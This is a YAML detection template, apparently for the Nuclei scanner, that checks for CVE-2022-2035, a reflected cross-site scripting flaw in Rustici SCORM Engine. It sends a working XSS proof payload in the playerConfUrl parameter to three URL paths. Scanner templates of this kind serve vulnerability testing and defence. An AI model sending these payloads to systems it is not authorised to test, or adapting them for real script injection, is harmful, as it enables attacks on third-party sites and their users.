CVE-2022-2035.yaml

id: CVE-2022-2035

info:
  name: XSS in Rustici Software SCORM Engine
  author: atomiczsec
  severity: medium
  description: |
    Cross-site scripting (XSS) vulnerability in the playerConfUrl parameter of the Scorm/Rustici Engine interface /defaultui/player/modern.html page
  reference:
    - https://www.tenable.com/security/research/tra-2022-21?src=nessus
    - https://nvd.nist.gov/vuln/detail/CVE-2022-2035
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2022-2035
    cwe-id: CWE-79
  tags: cve,cve2022,scorm,xss

requests:
  - method: GET
    path:
      - '{{BaseURL}}/ScormEngineInterface/defaultui/player/modern.html?playerConfUrl=data:text,alert(document.domain)//'
      - '{{BaseURL}}/scorm/defaultui/player/modern.html?playerConfUrl=data:text,alert(document.domain)//'
      - '{{BaseURL}}/RusticiEngine/defaultui/player/modern.html?playerConfUrl=data:text,alert(document.domain)//'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "Loading Engine's Content Player..."
      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200